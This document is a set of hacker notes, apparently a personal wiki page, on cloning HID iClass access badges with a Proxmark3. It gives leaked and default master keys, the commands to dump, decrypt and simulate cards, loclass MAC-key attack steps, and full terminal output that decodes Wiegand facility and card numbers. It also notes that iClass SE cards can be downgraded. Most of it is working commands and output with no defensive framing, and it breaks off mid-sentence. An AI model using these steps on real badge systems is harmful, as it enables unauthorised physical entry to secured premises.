Link to this headingHID iClass

Heart of Darkness Key: aea684a6dab23278
Source

Link to this headingPico Pass

Link to this headingiClass Legacy

  • Cryptography and Keys have been leaked
  • You can also make a clone of the card by just copying the encrypted data of the card. Even of the ID is from a diffrent card it still works.

Dump Static Keys:

[usb] pm3 --> hf iclass managekeys -p [=] idx| key [=] ---+------------------------ [=] 0 | AE A6 84 A6 DA B2 32 78 [=] 1 | FD CB 5A 52 EA 8F 30 90 [=] 2 | F0 E1 D2 C3 B4 A5 96 87 [=] 3 | 76 65 54 43 32 21 10 00 [=] 4 | [=] 5 | [=] 6 | [=] 7 | [=] ---+------------------------ #Test Known Keys hf iclass chk -f iclass_default_keys.dic #Check unlocked keys hf iclass dump --ki 0 hf iclass dump --ki 1 hf iclass dump --ki 2 hf iclass dump --ki 3 hf iclass dump --ki 4

Dump with known keys:

#Check unlocked keys hf iclass dump --ki 0 hf iclass dump --ki 1 hf iclass dump --ki 2 hf iclass dump --ki 3 hf iclass dump --ki 4

Decrypt Encrypted User Data:

[usb] pm3 --> hf iclass dump --ki 4 [+] Using AA1 (debit) key[4] 20 20 66 66 66 66 88 88 [=] Card has at least 2 application areas. AA1 limit 18 (0x12) AA2 limit 31 (0x1F) . [=] --------------------------- Tag memory ---------------------------- [=] block# | data | ascii |lck| info [=] ---------+-------------------------+----------+---+---------------- [=] 0/0x00 | F8 BC 03 14 FE FF 12 E0 | ........ | | CSN [=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config [=] 2/0x02 | FF FF FF FF FD FF FF FF | ........ | | E-purse [=] 3/0x03 | 44 DC D1 AF C0 97 7F E2 | D....... | | Debit [=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit [=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA [=] 6/0x06 | 03 03 03 03 00 03 E0 17 | ........ | | User / HID CFG [=] 7/0x07 | 8B EB ED DD 53 68 59 3B | ....ShY; | | User / Enc Cred [=] 8/0x08 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred [=] 9/0x09 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred [=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User [=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User [=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User [=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User [=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User [=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User [=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User [=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User [=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User [=] ---------+-------------------------+----------+---+---------------- [?] yellow = legacy credential [+] saving dump file - 19 blocks read [+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump.bin [+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump.json [?] Try `hf iclass decrypt -f` to decrypt dump file [?] Try `hf iclass view -f` to view dump file [usb] pm3 --> hf iclass decrypt -f hf-iclass-F8BC0314FEFF12E0-dump.bin [+] loaded 152 bytes from binary file `hf-iclass-F8BC0314FEFF12E0-dump.bin` [+] loaded 16 bytes from binary file `iclass_decryptionkey.bin` [!] Actual file len 152 vs HID app-limit len 144 [=] Setting limit to 144 [+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump-decrypted.bin [+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump-decrypted.json [=] --------------------------- Tag memory ---------------------------- [=] block# | data | ascii |lck| info [=] ---------+-------------------------+----------+---+---------------- [=] 0/0x00 | F8 BC 03 14 FE FF 12 E0 | ........ | | CSN [=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config [=] 2/0x02 | FF FF FF FF FD FF FF FF | ........ | | E-purse [=] 3/0x03 | 44 DC D1 AF C0 97 7F E2 | D....... | | Debit [=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit [=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA [=] 6/0x06 | 03 03 03 03 00 03 E0 14 | ........ | | User / HID CFG [=] 7/0x07 | 00 00 00 00 05 97 61 50 | ......aP | | User / Cred [=] 8/0x08 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred [=] 9/0x09 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred [=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User [=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User [=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User [=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User [=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User [=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User [=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User [=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User [=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User [=] ---------+-------------------------+----------+---+---------------- [?] yellow = legacy credential [=] Block 7 decoder [+] Binary..................... 101100101110110000101010000 [=] Wiegand decode [+] [H10301 ] HID H10301 26-bit FC: 203 CN: 45224 parity ( ok ) [+] [ind26 ] Indala 26-bit FC: 3259 CN: 168 parity ( ok ) [=] found 2 matching formats [=] ----------------------------------------------------------------- [usb] pm3 -->

Test for static key 0:

hf iclass dump -k "5B 7C 62 C4 91 C1 1B 39"

Use Default Keys:

hf iclass chk -f iclass_default_keys.dic

Simulate Card to Reader to get Keys:

#Use the Proxmark to become a Simulation of a IClass card hf iclass sim -t 2 #Then use that data to attack the MAC to get the MAC Key hf iclass loclass -f ../dumps/iclass_mac_attack.bin

Simulate other cards:

#Specify a CSN hf iclass sim -t 0 --csn 031FEC8AF7FF12E0 #Use default csn hf iclass sim -t 1 #Simulate full 2K tag hf iclass sim -t 3 #Reader Attack hf iclass sim -t 4

Link to this headingIClass Elite

loClass Attack

Test Known Keys:

[usb] pm3 --> hf iclass chk -f iclass_default_keys.dic --elite [+] loaded 28 keys from dictionary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\dictionaries/iclass_default_keys.dic [+] Reading tag CSN / CCNR... [+] CSN: 97 F5 15 14 FE FF 12 E0 [+] CCNR: FC FF FF FF FF FF FF FF 00 00 00 00 [=] Generating diversified keys using elite algo [+] Searching for DEBIT key... [+] Found valid key 20 20 66 66 66 66 88 88 [+] time in iclass chk 0.8 seconds [+] Added key to keyslot 4 [?] Try `hf iclass managekeys -p` to view keys

List known Keys:

[usb] pm3 --> hf iclass managekeys -p [=] idx| key [=] ---+------------------------ [=] 0 | AE A6 84 A6 DA B2 32 78 [=] 1 | FD CB 5A 52 EA 8F 30 90 [=] 2 | F0 E1 D2 C3 B4 A5 96 87 [=] 3 | 76 65 54 43 32 21 10 00 [=] 4 | 20 20 66 66 66 66 88 88 [=] 5 | [=] 6 | [=] 7 | [=] ---+------------------------

Dump Card:

[usb] pm3 --> hf iclass dump --ki 4 --elite [+] Using AA1 (debit) key[4] 20 20 66 66 66 66 88 88 [=] Card has at least 2 application areas. AA1 limit 18 (0x12) AA2 limit 31 (0x1F) . [=] --------------------------- Tag memory ---------------------------- [=] block# | data | ascii |lck| info [=] ---------+-------------------------+----------+---+---------------- [=] 0/0x00 | 97 F5 15 14 FE FF 12 E0 | ........ | | CSN [=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config [=] 2/0x02 | FC FF FF FF FF FF FF FF | ........ | | E-purse [=] 3/0x03 | 5A 81 46 19 E0 47 82 89 | Z.F..G.. | | Debit [=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit [=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA [=] 6/0x06 | 03 03 03 03 00 03 E0 17 | ........ | | User / HID CFG [=] 7/0x07 | 40 9D C6 43 21 42 A4 C6 | @..C!B.. | | User / Enc Cred [=] 8/0x08 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred [=] 9/0x09 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred [=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User [=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User [=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User [=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User [=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User [=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User [=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User [=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User [=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User [=] ---------+-------------------------+----------+---+---------------- [?] yellow = legacy credential

Decrypt Card:

[usb] pm3 --> hf iclass decrypt -f hf-iclass-97F51514FEFF12E0-dump.bin [+] loaded 152 bytes from binary file `hf-iclass-97F51514FEFF12E0-dump.bin` [+] loaded 16 bytes from binary file `iclass_decryptionkey.bin` [!] Actual file len 152 vs HID app-limit len 144 [=] Setting limit to 144 [+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-97F51514FEFF12E0-dump-decrypted.bin [+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-97F51514FEFF12E0-dump-decrypted.json [=] --------------------------- Tag memory ---------------------------- [=] block# | data | ascii |lck| info [=] ---------+-------------------------+----------+---+---------------- [=] 0/0x00 | 97 F5 15 14 FE FF 12 E0 | ........ | | CSN [=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config [=] 2/0x02 | FC FF FF FF FF FF FF FF | ........ | | E-purse [=] 3/0x03 | 5A 81 46 19 E0 47 82 89 | Z.F..G.. | | Debit [=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit [=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA [=] 6/0x06 | 03 03 03 03 00 03 E0 14 | ........ | | User / HID CFG [=] 7/0x07 | 00 00 00 00 05 97 63 04 | ......c. | | User / Cred [=] 8/0x08 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred [=] 9/0x09 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred [=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User [=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User [=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User [=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User [=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User [=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User [=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User [=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User [=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User [=] ---------+-------------------------+----------+---+---------------- [?] yellow = legacy credential [=] Block 7 decoder [+] Binary..................... 101100101110110001100000100 [=] Wiegand decode [+] [H10301 ] HID H10301 26-bit FC: 203 CN: 45442 parity ( ok ) [+] [ind26 ] Indala 26-bit FC: 3259 CN: 386 parity ( ok ) [=] found 2 matching formats [=] -----------------------------------------------------------------

Link to this headingICLASS SR

  • Card used as a traditional card between ICLASS Legacy and SE

Link to this headingICLASS SE

  • Uses the PicoPass Protocol
  • Standard Key and KDF have not been leaked
  • Can be downgraded to Legacy or SR Cards
  • Contains a Smart Card
    • Digital Signature Authentication
    • Encrypted

SIO: Encrypted Wiegand(ASN1) and Authentication MAC. Cloning data to another card wont work

  • Write keys are biased off the UID/CSN

Link to this headingDumping SIO Replay NRMAC

If you make a card with the same encrypted data